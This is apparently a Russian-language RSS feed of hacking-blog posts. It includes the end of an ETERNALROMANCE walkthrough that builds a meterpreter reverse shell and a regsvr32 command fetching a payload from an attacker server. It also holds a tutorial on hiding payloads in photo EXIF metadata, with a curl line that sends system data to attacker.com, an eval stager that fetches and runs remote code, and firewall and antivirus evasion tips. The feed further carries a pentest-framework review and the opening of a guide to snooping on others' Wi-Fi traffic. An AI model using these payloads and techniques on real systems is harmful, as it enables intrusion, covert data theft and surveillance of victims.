  <p>В отличие от ETERNALBLUE эксплоиты ETERNALROMANCE и ETERNALSYNERGY используют именованные каналы, и, соответственно, нужно выбрать тип канала, который необходим во время атаки.</p>
  <p> Лично я пользуюсь «spoolss». Альтернативный вариант: «browser». Кроме того, можно воспользоваться сканером auxiliary/scanner/smb/pipe_auditor в metasploit для поиска доступных каналов на целевой машине.</p>
  <p> Запуск без шелл-кода</p>
  <p> Теперь запускаем эксплоит при помощи следующей команды:</p>
  <pre>python exploit.py &lt;target_ip&gt; spoolss 
</pre>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image010.png" width="623" />
    <figcaption>Запуск эксплоита</figcaption>
  </figure>
  <p>Как было сказано ранее, если эксплуатация завершилась успешно, в корневой директории диска «C:\» появится новый файл «pwned.txt».</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image012.png" width="419" />
    <figcaption> После успешной эксплуатации на целевой машине появился файл</figcaption>
  </figure>
  <pre>pwned.txt
</pre>
  <p> На данный момент мы уже сделали большой шаг, выполнив успешную эксплуатацию. Теперь нужно модифицировать эксплоит так, чтобы запустить шелл в meterpreter.</p>
  <p> Создание шелл-кода</p>
  <p> Существует множество способов запустить meterpreter-шелл или выполнить какие-либо другие действия вместо создания текстового файла.</p>
  <p> Первый шаг – генерирование шелл-кода, который мы будем использовать в дальнейшем. Лично я очень люблю один метод, у которого масса преимуществ, когда речь заходит про обход различных защит.</p>
  <p> Шелл-код будет помещен в файл .SCT, который эксплоит будет загружать и запускать на целевой машине, в результате чего мы получим долгожданную meterpreter-сессию.</p>
  <p> Создание файла .SCT при помощи утилиты PS1ENCODE</p>
  <p> Ps1encode позволяет сгенерировать и закодировать полезные нагрузки для metasploit в различных форматах на базе PowerShell.</p>
  <p> Эту утилиту можно загрузить на github: <a href="https://github.com/CroweCybersecurity/ps1encode" target="_blank">https://github.com/CroweCybersecurity/ps1encode</a>.</p>
  <p> Для генерирования нужной полезной нагрузки нам необходимо запустить Ps1encode со следующими параметрами:</p>
  <pre> ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=&lt;ATTACKER_IP&gt; --LPORT=4444 -t sct
</pre>
  <p> Сгенерированный файл .SCT должен храниться на веб-сервере на машине злоумышленника или в любом другом месте, к которому можно получить доступ из целевой системы. Поэтому при запуске предыдущей команды задается вопрос о том, какой будет полный URL, где мы будем хранить файл .sct. Если будет использоваться машина злоумышленника, нужно ввести следующий URL: http://&lt;ATTACKER_IP&gt;.</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image014.png" width="623" />
  </figure>
  <p>Помещение шелл-кода в место, доступное из целевой системы</p>
  <p> На предыдущем шаге мы создали файл index.sct в папке утилиты Ps1Encode. Чтобы этот файл был доступен для загрузки эксплоитом на целевой машине мы должны поместить полезную нагрузку в папку веб-сервера и назначить нужные права.</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image016.png" width="624" />
    <figcaption>Копирование полезной нагрузки на веб-сервер и назначение прав</figcaption>
  </figure>
  <p>После выполнения команд, показанных на рисунке выше, у нас появляется шелл-код, готовый к употреблению.</p>
  <p> Изменение эксплоита</p>
  <p>Если мы откроем скрипт в текстовом редакторе и перейдем к строке 463 (и ниже), то увидим следующий код:</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image018.png" width="624" />
    <figcaption> Участок кода эксплоита</figcaption>
  </figure>
  <p>На рисунке выше показаны функции, используемые для создания файла «pwned.txt» на целевой машине. Более интересной для нас является закомментированная строка с функцией service_exec().</p>
  <p> Функция service_exec() в качестве примера выполняет команду «copy» для создания копии файла «pwned.txt». Эта строка кода не будет выполняться до тех пор, пока вначале стоит символ «#». Если убрать этот символ и запустить эксплоит повторно, мы увидим, что в корне диска «C:\» появилось два файла: <em>pwned.txt </em>и <em>pwned_exec.txt</em>.</p>
  <p>Вместо команды copy можно поставить любую другую, которая нам необходима.</p>
  <p> Запуск шелл-кода</p>
  <p> Теперь мы знаем, в каком месте нужно модифицировать эксплоит для выполнения команды загрузки и запуска шелла в meterpreter:</p>
  <pre> regsvr32 /s /n /u /i:http://&lt;attacker_webserver_ip&gt;/shellcode.sct scrobj.dll 
</pre>
  <p>Эксплоит будет выглядеть так:</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image020.png" width="624" />
    <figcaption>Модифицированная версия эксплоита</figcaption>
  </figure>
  <p>Получение Meterpreter-сессии</p>
  <p> В самом конце, перед запуском эксплоита, мы должны настроить модуль exploit/multi/handler для получения meterpreter-сессии.</p>
  <p> </p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image022.png" width="623" />
    <figcaption>Настройка модуля exploit/multi/handler</figcaption>
  </figure>
  <p> Далее запускаем модифицированную версию эксплоита:</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image024.png" width="624" />
    <figcaption>Запуск измененного эксплоита</figcaption>
  </figure>
  <p>Через несколько секунд мы получим meterpreter-сессию на целевой машине с системными привилегиями.</p>
  <figure class="m_column">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image026.png" width="624" />
    <figcaption>Получение сессии</figcaption>
  </figure>
  <p>The End.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/hUomrBve</guid><link>https://teletype.in/@krakenteam/hUomrBve?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/hUomrBve?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Скрываем Payload внутри метаданных фотографий</title><pubDate>Wed, 05 Feb 2020 15:22:40 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/53/5d/535dbc18-0471-4afa-bacc-e68bda528d56.png"></media:content><description><![CDATA[<img src="https://telegra.ph/file/0154eb10cc3805811065f.png"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>Сложные сценарии оболочки могут быть имплантированы в метаданные фотографий и позже использованы для эксплуатации MacBook. В дополнение к запутыванию истинной природы атаки, эта техника может быть использована для обхода сетевых брандмауэров, а также бдительных системных администраторов.</p>
  <p>В этом сценарии атаки вредоносная команда будет встроена непосредственно в метаданные EXIF файла изображения. Злоумышленник разместит вредоносное изображение на общедоступном веб-сайте, таком как Flickr, что сделает его доступным для загрузки любым пользователем. Затем будет создан накопитель для загрузки изображения, извлечения метаданных и выполнения встроенной команды.</p>
  <p>Чтобы было ясно, двойной щелчок по файлу изображения не приведет к выполнению встроенной команды. Это другой тип атаки на macOS, о котором мы говорили в другой статье. Вместо этого команда будет скрыта в метаданных изображения и использована в качестве системы доставки полезной нагрузки.</p>
  <p>Stager и Payload - два разных аспекта атаки. Stager предназначен для загрузки изображения и выполнения встроенной полезной нагрузки, в то время как полезная нагрузка является последним битом кода (встроенным в изображение) предназначенным для выполнения одной или нескольких команд.</p>
  <h4><br /></h4>
  <h4>Зачем вставлять Payload данные в изображения?</h4>
  <p>Итак, зачем вообще делать ставку, если злоумышленник уже в состоянии выполнить код на целевом MacBook? Ну, в первую очередь, разной степени активного уклонения. Кроме того, возможности размещения могут быть довольно маленькими, всего ~ 100 символов, что ускоряет их выполнение, например, с помощью атаки USB Rubber Ducky или MouseJack.</p>
  <p>В большинстве случаев скрытие полезных данных внутри файла изображения не требуется. Однако в средах с высокой степенью безопасности, где каждый домен регистрируется программным обеспечением брандмауэра, может быть полезно скрыть содержимое и источник полезной нагрузки.</p>
  <h4><br /></h4>
  <h4>Уклонение от брандмауэра</h4>
  <p>С помощью программного обеспечения, такого как <a href="https://www.pfsense.org/" target="_blank">pfSense</a>, регистрируются все домены и IP-адреса, которые посещает каждое устройство в сети. С помощью коммерческого программного обеспечения, такого как брандмауэр <a href="https://www.fortinet.com/products/next-generation-firewall/high-end.html" target="_blank">FortiGate компании Fortinet</a>, каждый пакет может быть тщательно проанализирован для анализа. Брандмауэры такого типа мешают злоумышленнику, использующему простые TCP-соединения, установленные с Netcat, сохранять на скомпрометированном устройстве или скрытно отображать сеть.</p>
  <p>Использование изображений для сокрытия полезных нагрузок может затруднить отслеживание трафика системными администраторами для определения активности как вредоносной или подозрительной.</p>
  <h4><br /></h4>
  <h4>Уклонение от глубокой проверки пакетов</h4>
  <p>В защищенных средах операционные системы могут быть сконфигурированы для использования пользовательских сертификатов, которые позволяют сетевым администраторам дешифровать данные, поступающие и получаемые с устройств в сети. С помощью таких инструментов, как Wireshark, можно скомпилировать потоки TCP и воссоздать файлы изображений, используя необработанные захваченные данные.</p>
  <h4><br /></h4>
  <h4>Антивирус Уклонение</h4>
  <p>Премиум-версии антивирусного программного обеспечения Avast и AVG могут анализировать и обнаруживать определенные виды накопителей и полезных данных. Например, программное обеспечение AV может идентифицировать большинство рабочих столов, созданных <a href="https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/stagers/osx/application.py" target="_blank">Empire</a>. В защищенных сетевых средах может потребоваться высокая степень запутывания, чтобы избежать обнаружения сигнатур. Использование антивирусных программ может затруднить AV-программам обнаружение истинной природы конкретного файла.</p>
  <h4><br /></h4>
  <h4>Инструменты для ознакомления</h4>
  <p>Прежде чем продолжить, вы должны иметь общее представление о таких инструментах, как <a href="https://linux.die.net/man/1/curl" target="_blank">curl</a>, system_profiler, exiftool, grep и Bash. Все эти темы были описаны в Null Byte ранее в некоторый момент.</p>
  <h4><br /></h4>
  <h4>Скачать изображение</h4>
  <p>Для начала загрузите изображение, которое будет использовано при атаке. Stager (показанный на следующем шаге) на самом деле не будет сохранять изображение на компьютер цели, поэтому он не должен быть изображением чего-либо особенно значимого. В демонстрационных целях мы можем использовать изображение профиля в Twitter, которое можно загрузить с помощью <strong>wget </strong>и сохранить (<strong>-O</strong>) в каталог /tmp.</p>
  <pre>~$ wget &#x27;https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg&#x27; -O image.jpg

--2019-05-15 06:50:22--  https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg
Resolving pbs.twimg.com (pbs.twimg.com)... 72.21.91.70, 2606:2800:220:1410:489:141e:20bb:12f6
Connecting to pbs.twimg.com (pbs.twimg.com)|72.21.91.70|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19316 (19K) [image/jpeg]
Saving to: ‘image.jpg’

image.jpg                100%[=================================&gt;]  18.86K  64.4KB/s    in 0.3s

2019-05-02 06:50:25 (64.4 KB/s) - ‘image.jpg’ saved [19316/19316]
</pre>
  <h4><br /></h4>
  <h4>Создать полезную нагрузку</h4>
  <p>Для этого примера мы сначала научимся выполнять простую <strong>touch</strong> команду. Когда модуль stager выполняет полезную нагрузку, встроенную в изображение, он создает на рабочем столе macOS пустой файл с именем «hacked».</p>
  <p>Сначала используйте <strong>printf</strong>, <strong>base64</strong> и <strong>tr</strong> для кодирования полезной нагрузки. Base64 закодирует строку, а <strong>tr</strong> удалит (<strong>-d</strong>) переводы строки (<strong>\n</strong>). Вы всегда должны заключать полезные данные (<strong>touch ~/Desktop/hacked</strong>)) в одинарные кавычки.</p>
  <pre>~$ printf &#x27;touch ~/Desktop/hacked&#x27; | base64 | tr -d &#x27;\n&#x27;

dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==
</pre>
  <p>Более сложную полезную нагрузку, которая включает в себя команду macOS system_profiler, можно использовать для выполнения ситуационных атак, а также для скручивания, чтобы отфильтровать вывод команды на сервер злоумышленника.</p>
  <pre>~$ printf &#x27;d=$(system_profiler SPFirewallDataType);curl -s --data &quot;$d&quot; -X POST http://attacker.com/index.php&#x27; | base64 | tr -d &#x27;\n&#x27;

ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA==
</pre>
  <p>Сделав еще один шаг вперед, можно было бы закодировать весь скрипт Bash, который был сжат в одну строку. В моих тестах, казалось, не было ограничений на количество символов, которые могут быть встроены в тег метаданных.</p>
  <pre>~$ cat /path/to/any_script.sh | base64 | tr -d &#x27;\n&#x27;

ZnVuY3Rpb24gZXhlY19oYWNrKCkgeyAvdXNyL2Jpbi90b3VjaCB+L0Rlc2t0b3AvaGFja2VkOyB9O2V4ZWNfaGFjawo=
</pre>
  <h4><br /></h4>
  <h4>Вставить Payload в изображение</h4>
  <p>Чтобы встроить закодированную полезную нагрузку в образ, установите <strong>exiftool</strong>.</p>
  <pre>~$ apt-get update &amp;&amp; apt-get install exiftool -V

Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting &#x27;libimage-exiftool-perl&#x27; instead of &#x27;exiftool&#x27;
The following NEW packages will be installed:
   libarchive-zip-perl (1.64-1)
   libimage-exiftool-perl (11.16-1)
   libmime-charset-perl (1.012.2-1)
   libposix-strptime-perl (0.13-1+b5)
   libsombok3 (2.4.0-2)
   libunicode-linebreak-perl (0.0.20190101-1)
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 3,629 kB of archives.
After this operation, 21.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
</pre>
  <p>Затем удалите все метаданные EXIF, которые могут быть на изображении.</p>
  <pre>~$ exiftool -all= image.jpg
  1 image files updated
</pre>
  <p>Затем используйте <strong>exiftool</strong> для добавления тега метаданных - он будет работать с любым доступным тегом - содержащим закодированную полезную нагрузку. В этой демонстрации используется тег <strong>Certificate</strong>.</p>
  <pre>~$ exiftool -Certificate=&#x27;dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==&#x27; image.jpg
  1 image files updated
</pre>
  <p>Когда это будет сделано, убедитесь, что тег Certificate был правильно добавлен с помощью следующей команды <strong>exiftool</strong>. Обратите внимание на закодированную строку в строке 13.</p>
  <pre>~$ exiftool image.jpg

01  ExifTool Version Number         : 11.16
02  File Name                       : image.jpg
03  Directory                       : .
04  File Size                       : 21 kB
05  File Modification Date/Time     : 2019:05:02 06:50:57+00:00
06  File Access Date/Time           : 2019:05:02 06:50:57+00:00
07  File Inode Change Date/Time     : 2019:05:02 06:50:57+00:00
08  File Permissions                : rw-r--r--
09  File Type                       : JPEG
10  File Type Extension             : jpg
11  MIME Type                       : image/jpeg
12  XMP Toolkit                     : Image::ExifTool 11.16
13  Certificate                     : dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==
14  Image Width                     : 400
15  Image Height                    : 400
16  Encoding Process                : Progressive DCT, Huffman coding
17  Bits Per Sample                 : 8
18  Color Components                : 3
19  Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
20  Image Size                      : 400x400
21  Megapixels                      : 0.160
</pre>
  <h4><br /></h4>
  <h4>Загрузить изображение на сайт</h4>
  <p>Найти подходящий сайт сложно. Критерии для этого несколько.</p>
  <p><strong>Избегайте очистки данных EXIF</strong></p>
  <p>Многие популярные веб-сайты, такие как Twitter, Imgur и Instagram, автоматически удаляют метаданные из изображений при загрузке, что делается главным образом для защиты пользователей от случайной загрузки фотографий, содержащих координаты GPS, которые позволят кибер-преследователям и кибербуллинам беспокоить и находить этих пользователей.</p>
  <p>Изображения, содержащие полезные данные, будут удалены при загрузке на основные веб-сайты. Веб-сайт-кандидат должен был бы быть проверен вручную, сначала загрузив изображение, затем загрузив его, и используя exiftool, чтобы убедиться, что встроенная полезная нагрузка все еще не повреждена.</p>
  <p><br /></p>
  <p><strong>Шифрование сайта</strong></p>
  <p>Безопасность транспортного уровня имеет важное значение для дальнейшей маскировки этой атаки. Веб-сайт, на котором размещалось изображение, должен использовать HTTPS, что поможет предотвратить сисадмины в анализе запроса GET с хирургической точностью.</p>
  <p><br /></p>
  <p><strong>Нарушения веб-трафика</strong></p>
  <p>В идеале, веб-сайт, использованный в атаке, должен регулярно посещаться сайтом. Например, если цель посещала определенный новостной сайт каждое утро, посещение этого домена не показалось бы подозрительным для системных администраторов, отслеживающих трафик в сети. С другой стороны, необычный GET-запрос на иностранный сайт или сайт для взрослых, вероятно, вызовет некоторые красные флаги. Этот вид информации может быть перечислен на этапе разведки с помощью скрытых захватов пакетов. Главное, чтобы трафик выглядел как можно более привычным для поведения веб-сайта цели.</p>
  <h4><br /></h4>
  <h4>Генерация Stager</h4>
  <p>В моих быстрых попытках извлечь метаданные из изображений с помощью встроенных <a href="https://apple.stackexchange.com/questions/222342/terminal-command-to-get-all-of-a-files-metadata" target="_blank">инструментов macOS</a>, ни один из них, казалось, не был способен получить доступ или показать конкретную строку («Сертификат») метаданных EXIF, встроенных в изображение. К счастью, у <strong>grep</strong> есть опция <strong>-a</strong>, которая позволяет ему обрабатывать двоичные файлы (например, изображения), как если бы они были в незашифрованном виде, что позволяет ему находить строку «Сертификат» в метаданных.</p>
  <p>Ниже приведен пример stager, который можно использовать для загрузки изображений, извлечения и декодирования полезных нагрузок, а затем для выполнения команды.</p>
  <pre>~$ p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed &#x27;s/&lt;[^&gt;]*&gt;//g&#x27; | base64 -D);eval $p
</pre>
  <p>Здесь происходит несколько вещей, поэтому я разобью каждую секцию каскадера.</p>
  <ul>
    <li><strong>p=$(...)</strong> - большая часть stager заключена в переменную с именем &quot;p&quot; (иначе - полезная нагрузка), предназначенную, прежде всего, для предотвращения сохранения изображения непосредственно на жесткий диск MacOS цели.</li>
    <li><strong>curl -s https://website.com/image.jpg</strong> - здесь используется Curl для автоматической загрузки (-s) изображения, содержащего полезную нагрузку, с веб-сайта, выбранного злоумышленником. Изображение немедленно передается (|) в следующую команду grep.</li>
    <li><strong>grep Cert -a</strong> - Grep будет принимать необработанные данные изображения, обрабатывать их как открытый текст (-a) при поиске строки «Cert». Этот вывод появится в терминале, как показано ниже.</li>
  </ul>
  <figure class="m_column">
    <img src="https://telegra.ph/file/0154eb10cc3805811065f.png" width="1249" />
  </figure>
  <ul>
    <li><strong>sed &#x27;s/&lt;[^&gt;]*&gt;//g&#x27;</strong> - вышеприведенный вывод немедленно передается в эту команду sed. Sed удалит все окружающие данные XML (то есть &lt;xmpRights&gt; &lt;/ xmpRights&gt;), оставив только закодированную строку.</li>
  </ul>
  <figure class="m_column">
    <img src="https://telegra.ph/file/9bc4be46fb0981823ec23.png" width="1249" />
  </figure>
  <ul>
    <li><strong>base64 -D</strong> - закодированная строка передается в эту команду base64, где она декодируется с опцией -D, что в конечном итоге делает переменную $ p декодированной полезной нагрузкой.</li>
  </ul>
  <figure class="m_column">
    <img src="https://telegra.ph/file/2101807977875ad016302.png" width="1249" />
  </figure>
  <ul>
    <li><strong>eval $p</strong> - наконец, eval используется для оценки переменной как команды, эффективно выполняя полезную нагрузку в форме переменной.</li>
  </ul>
  <p>Мы можем убедиться, что атака была успешно выполнена, найдя «взломанный» файл на рабочем столе macOS.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/89dbe983ef67f2613a387.png" width="1268" />
  </figure>
  <p>Опять же, это очень простая полезная нагрузка. Более сложные атаки могут включать автоматический сброс пароля браузера, прослушивание микрофона, перечисление ситуационной осведомленности, повышение привилегий, эксфильтрацию пароля sudo и так далее.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/HyVM0OVGU</guid><link>https://teletype.in/@krakenteam/HyVM0OVGU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/HyVM0OVGU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Много модульный framework TIDOS</title><pubDate>Sun, 02 Feb 2020 16:51:23 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/1a/77/1a774c64-00d0-45c4-b3fa-f327a61e1126.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/1a/77/1a774c64-00d0-45c4-b3fa-f327a61e1126.png"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/1a/77/1a774c64-00d0-45c4-b3fa-f327a61e1126.png" width="1161" />
  </figure>
  <p>Поговорим сегодня о амбициозном framework</p>
  <p>Который был создан theinfecteddrake недавно.</p>
  <p>Работа очень объёмная и впечатляющая.</p>
  <p>В инструмент заложены 73 различных модуля,ориентированных на пентест.</p>
  <p>Также,много уделено внимания по сбору информации,детекту защитных систем ресурсов.</p>
  <p>Проще наверное перечислить чего в этом монстре нет.</p>
  <p><strong>Модули:</strong></p>
  <p>Reconnaissance + OSINT</p>
  <p>Passive Reconnaissance:</p>
  <p>Ping/Nping Enumeration</p>
  <p>WhoIS Lookup</p>
  <p>GeoIP Lookup</p>
  <p>DNS Config. Lookup</p>
  <p>Subdomains Lookup</p>
  <p>Reverse DNS Lookup</p>
  <p>Reverse IP Lookup</p>
  <p>Web Links Gatherer</p>
  <p>Google Search (manual search)</p>
  <p>Google Dorking (multiple modules) automated</p>
  <p>Active Reconnaissance</p>
  <p>HPing3 enumeration (automated)</p>
  <p>CMS Detection (185+ CMSs supported)</p>
  <p>Advanced Traceroute IMPROVED</p>
  <p>Grab HTTP Headers</p>
  <p>Detect Server IMPROVED</p>
  <p>Examine SSL Certificate</p>
  <p>robots.txt and sitemap.xml Checker</p>
  <p>Subnets Enumeration</p>
  <p>Find Shared DNS Hosts</p>
  <p>Operaing System Fingerprint</p>
  <p>Information Disclosure</p>
  <p>Credit Cards Disclosure in Plaintext</p>
  <p>Email Harvester</p>
  <p>Fatal Errors Enumeration Includes Full Path Disclosure checks</p>
  <p>Internal IP Disclosure</p>
  <p>Phone Number Havester</p>
  <p>Social Security Number Harvester</p>
  <p>Scanning &amp; Enumeration</p>
  <p>Remote Server WAF Analysis</p>
  <p>Port Scanning Ingenious Modules</p>
  <p>Simple Port Scanner via Socket Connections</p>
  <p>TCP SYN Scan</p>
  <p>TCP Connect Scan</p>
  <p>XMAS Flag Scan</p>
  <p>Fin Flag Scan</p>
  <p>Service Detector</p>
  <p>Crawlers</p>
  <p>Depth 1</p>
  <p>Depth 2 IMPROVED</p>
  <p>Vulnerability Analysis</p>
  <p>Web-Bugs &amp; Server Misconfigurations</p>
  <p>Insecure CORS iCORS</p>
  <p>Same-Site Scripting</p>
  <p>Zone Transfer DNS Server based</p>
  <p>Clickjacking Framable Response</p>
  <p>Security on Cookies HTTPOnly/Secure Flags</p>
  <p>Cloudflare Misconfiguration Check + Getting Real IP</p>
  <p>HTTP High Transport Security Usage</p>
  <p>Spoofable Email (Missing SPF and DMARC Records)</p>
  <p>Security Headers Analysis</p>
  <p>Cross-Site Tracing (Port Based)</p>
  <p>Network Security Misconfig. (Telnet Enabled)</p>
  <p>Serious Web Vulnerabilities</p>
  <p>File Intrusions</p>
  <p>Local File Intrusion (LFI)</p>
  <p>Remote File Inclusion (RFI)</p>
  <p>OS Command Execution Linux &amp; Windows (RCE)</p>
  <p>Path Traversal (Sensitive Paths)</p>
  <p>Cross-Site Request Forgery</p>
  <p>SQL Injection</p>
  <p>Cookie Value Based</p>
  <p>Referer Value Based</p>
  <p>User-Agent Value Based</p>
  <p>Host Header Injection</p>
  <p>Bash Command Injection Shellshock</p>
  <p>Cross-Site Scripting beta</p>
  <p>Cookie Value Based</p>
  <p>Referer Value Based</p>
  <p>User-Agent Value Based</p>
  <p>CRLF Injection and HTTP Response Splitting</p>
  <p>Auxillaries</p>
  <p>Protocol Credential Bruteforce 3 more under dev.</p>
  <p>FTP Bruteforce</p>
  <p>SSH Bruteforce</p>
  <p>POP 2/3 Bruteforce</p>
  <p>SQL Bruteforce</p>
  <p>String &amp; Payload Encoder</p>
  <p>URL Encode</p>
  <p>Base64 Encode</p>
  <p>HTML Encode</p>
  <p>Plain ASCII Encode</p>
  <p>Hex Encode</p>
  <p>Octal Encode</p>
  <p>Binary Encode</p>
  <p>GZip Encode</p>
  <p>Exploitation purely developmental</p>
  <p>ShellShock</p>
  <p><strong>Как установить:</strong></p>
  <p>Код:</p>
  <pre># git clone https://github.com/theinfecteddrake/TIDoS-Framework.git
# cd TIDoS-Framework
# chmod +x install
# pip install tld - на случай,если будет просить этот пакет
# ./install
# tidos - команда запуска</pre>
  <p>Информация предоставлена исключительно в рамках ознакомления и изучения проблем ИБ.</p>
  <p>Запрещается использование инструмента в незаконных целях и без надлежащих обоюдосторонних договорённостей.</p>
  <p>Но пришлось с ним повозиться,даже не помню какие пакеты он требовал.</p>
  <p>Будьте готовы к тому,что запросто он не заведётся.</p>
  <p>Работает он на ОС Debian,да и в установочном файле прописана команда установки через apt</p>
  <p>И скачивание файлов с пакетами deb соответственно.</p>
  <p>При установке нас встречает вот такое окно</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/7a/37/7a371591-0bc8-47c6-a85f-70f76e2b83c3.png" width="809" />
  </figure>
  <p>Самое простое ,что характеризует TIDOS-это указание url цели.</p>
  <p>Всё остальное сложно,хотя инструмент прекрасно работает.</p>
  <p>Всегда переключает модули,предлагая различные тесты.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/d6/1e/d61e70f4-1cf2-4930-8521-9ec32098f587.png" width="1161" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/fe/c1/fec10f09-14d5-4300-9fd9-11a0f94a40d3.png" width="932" />
  </figure>
  <p>Остановить работу модуля можно с помощью клавиш Ctrl+C</p>
  <p>При этом , работа продолжится с предоставлением очередного выбора опций.</p>
  <p>Несколько часов могут пройти незаметно в компании с этим framework.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/2e/a4/2ea44f14-6bdb-439b-af1b-b20ebc2aab95.png" width="944" />
  </figure>
  <p>Есть возможность как ручного режима коррекции теста,так и автоматизированного.</p>
  <p>Причём,такая опция присутствует на всех фазах проведения теста.</p>
  <p>Надеюсь,что он понравится многим,а я на этом завершаю обзор.</p>
  <p>Благодарю всех за внимание и до новых встреч.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/r1r3VuVzI</guid><link>https://teletype.in/@krakenteam/r1r3VuVzI?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/r1r3VuVzI?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Следим за чужим трафиком со смартфона [Wireshark]</title><pubDate>Sun, 02 Feb 2020 16:11:24 GMT</pubDate><media:content medium="image" url="https://telegra.ph/file/e196aba6e6dc41366f17e.jpg"></media:content><description><![CDATA[<img src="https://telegra.ph/file/e196aba6e6dc41366f17e.jpg"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>Итак, вы хотите знать, чем занимается человек, который всегда разговаривает по телефону? Если вы находитесь в той же сети Wi-Fi, это так же просто, как открыть Wireshark и настроить несколько параметров. Мы будем использовать этот инструмент для расшифровки сетевого трафика WPA2, чтобы мы могли следить за тем, какие приложения работает в телефоне в режиме реального времени.</p>
  <p>Хотя использование зашифрованной сети лучше, чем использование открытой, преимущество исчезает, если злоумышленник находится в той же сети. Если кто-то еще знает пароль к используемой вами сети Wi-Fi, с помощью Wireshark легко увидеть, что вы делаете в данный момент. Он может позволить злоумышленнику создать список всех приложений, запущенных на целевом устройстве, и сосредоточиться на приложениях, которые могут быть уязвимы.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/e196aba6e6dc41366f17e.jpg" width="1200" />
  </figure>
  <h4>Расшифровка зашифрованных пакетов</h4>
  <p>Когда вы используете сеть Wi-Fi, которая использует шифрование WPA2, безопасность вашего сеанса основывается на двух вещах. Первый - это пароль, который используется для генерации гораздо более длинного числа, PSK или предварительного общего ключа. Второе - это собственно рукопожатие, которое должно произойти, чтобы установить соединение. Если злоумышленник получает PSK для сети Wi-Fi и либо наблюдает, как вы подключаетесь к сети, либо пинает вас на мгновение, он может расшифровать ваш трафик Wi-Fi, чтобы увидеть, что вы делаете.</p>
  <p>Контент веб-сайтов HTTPS не будет виден, но все обычные веб-сайты HTTP, которые вы посещаете, или любые небезопасные приложения HTTP-запросов на вашем телефоне, отображаются в открытом виде. Это может показаться не таким уж большим делом, но всего за 60 секунд легко узнать много нового о том, какое устройство мы отслеживаем, и что именно на нем работает. Кроме того, DNS-запросы для разрешения доменов, с которыми приложения должны общаться, чтобы работать, легко увидеть, определяя, какие приложения и службы активны.</p>
  <h4><br /></h4>
  <h4>Как это работает?</h4>
  <p>Чтобы осуществить эту атаку, необходимо выполнить несколько условий. Во-первых, нам нужен пароль, мы должны быть рядом с жертвой, чтобы мы могли записывать трафик, и мы должны иметь возможность отключить целевое устройство от сети или подождать, пока они снова подключатся. Мы откроем Wireshark и получим доступ к меню для дешифрования пакетов Wi-Fi, добавим PSK для включения дешифрования и будем ждать пакеты EAPOL от целевого устройства, подключающегося к сети.</p>
  <p>Чтобы понять, к чему стремится целевое устройство, мы будем использовать фильтры захвата для выделения искомых пакетов DNS и HTTP. Чтобы увидеть полный список каждого домена, разрешенного устройством, мы также можем посмотреть сводку разрешенных доменов после завершения захвата. Мы можем использовать эту информацию, чтобы легко определить, какие службы запущены, даже если они работают только в фоновом режиме, и приложение не запускалось уже довольно давно.</p>
  <h4><br /></h4>
  <h4>Что вам понадобится</h4>
